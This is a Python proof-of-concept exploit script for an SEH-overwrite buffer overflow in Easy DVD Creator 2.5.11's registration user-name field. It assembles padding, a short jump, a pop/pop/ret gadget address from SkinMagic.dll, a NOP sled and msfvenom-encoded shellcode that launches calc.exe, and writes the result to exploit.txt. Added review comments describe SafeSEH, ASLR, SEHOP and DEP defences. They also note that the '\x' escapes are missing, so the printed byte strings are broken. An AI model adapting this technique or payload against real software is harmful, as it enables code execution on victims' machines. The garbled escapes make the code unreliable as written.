#!/usr/bin/env python

# Exploit Title : Easy DVD Creator 2.5.11 - Buffer Overflow in 'Registration UserName Field' (SEH)
# Discovery by : Shubham Singh
# Known As : Spirited Wolf [Twitter: @Pwsecspirit]
# Email : spiritedwolf@protonmail.com
# Youtube Channel : www.youtube.com/c/Pentestingwithspirit
# Discovery Date : 29/07/2018
# Software Link : http://www.divxtodvd.net/dvd-creator.htm
# Tested Version : 2.5.11
# Tested on OS : Windows XP Service Pack 3 x86
# Steps to Reproduce: Run the python exploit script, it will create a new file with the name "exploit.txt".
# Just copy the text inside "exploit.txt" and start the Easy DVD Creator 2.5.11 program and click on "Register".
# In the third field i.e. "Enter User Name" paste the content of "exploit.txt" and click on "OK". You will see a sweet calculator pop up.
# Greetz : @FuzzySec @LiveOverflow @hexachordanu

# --- Payload layout (documented for analysis / defensive review) ---
# The string written at the bottom is assembled as:
#   padding | nSEH (short jump) | SEH handler address (pop/pop/ret gadget) | NOP sled | shellcode | filler
# and the final assignment pads it so the overall length is held at 1000.
#
# NOTE(review): the "\x" escape prefixes appear to have been lost when this
# listing was transcribed; as printed, each "xNN" token is three literal
# characters rather than one byte, so the byte counts in the comments and the
# length arithmetic below describe the author's intent, not what this text
# would literally produce.

# Padding up to the SEH record (author's intent: 996 bytes of 'A').
buffer = "x41" * 996
#Short Jump address
# nSEH overwrite: per the author's note, a short forward jump over the
# following handler address into the NOP sled.
nseh = "xebx06x90x90"
#0x10037859 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False,
# v1.8.1.1 (C:\Program Files\Easy DVD Creator\SkinMagic.dll)
# Defensive note: this chain depends on the module above being flagged as
# lacking SafeSEH and ASLR (and not rebased), as the author's line states.
# Building the DLL with /SAFESEH and /DYNAMICBASE, or enabling SEHOP at the
# OS level, breaks this class of SEH-overwrite technique; DEP additionally
# blocks execution of the stack-resident payload.
seh= "x59x78x03x10"
#badchar x00x0ax0d
#msfvenom -p windows/exec CMD=calc.exe -b 'x00x0ax0d' -f python
# Encoded payload as emitted by the generator command quoted above (it
# launches calc.exe per that command line); the bytes listed as bad chars
# were excluded by the encoder.
buf = ""
buf += "xbfx4dxb3x6bx1exdaxdaxd9x74x24xf4x58x33"
buf += "xc9xb1x31x31x78x13x83xe8xfcx03x78x42x51"
buf += "x9exe2xb4x17x61x1bx44x78xebxfex75xb8x8f"
buf += "x8bx25x08xdbxdexc9xe3x89xcax5ax81x05xfc"
buf += "xebx2cx70x33xecx1dx40x52x6ex5cx95xb4x4f"
buf += "xafxe8xb5x88xd2x01xe7x41x98xb4x18xe6xd4"
buf += "x04x92xb4xf9x0cx47x0cxfbx3dxd6x07xa2x9d"
buf += "xd8xc4xdex97xc2x09xdax6ex78xf9x90x70xa8"
buf += "x30x58xdex95xfdxabx1exd1x39x54x55x2bx3a"
buf += "xe9x6exe8x41x35xfaxebxe1xbex5cxd0x10x12"
buf += "x3ax93x1exdfx48xfbx02xdex9dx77x3ex6bx20"
buf += "x58xb7x2fx07x7cx9cxf4x26x25x78x5ax56x35"
buf += "x23x03xf2x3dxc9x50x8fx1fx87xa7x1dx1axe5"
buf += "xa8x1dx25x59xc1x2cxaex36x96xb0x65x73x68"
buf += "xfbx24xd5xe1xa2xbcx64x6cx55x6bxaax89xd6"
buf += "x9ex52x6exc6xeax57x2ax40x06x25x23x25x28"
buf += "x9ax44x6cx4bx7dxd7xecxa2x18x5fx96xba"

# NOP sled (author's intent: 16 bytes) that the short jump in nseh is meant
# to land in ahead of the payload.
nops = "x90" * 16

# Assemble the record and pad with 'C' so the total length is exactly 1000;
# the literal 8 stands for nseh + seh (4 bytes each) in the intended layout.
exploit = buffer + nseh + seh + nops + buf + "C" * (1000 - len(buffer) - 8 - len(nops) - len(buf))
# NOTE(review): the file is opened in text mode ("w") with no explicit
# encoding and no `with` block. Under Python 3 a str payload would be
# re-encoded as UTF-8 on write; the `python` shebang does not pin an
# interpreter version, so confirm which one was intended.
f = open ("exploit.txt", "w")
f.write(exploit)
f.close()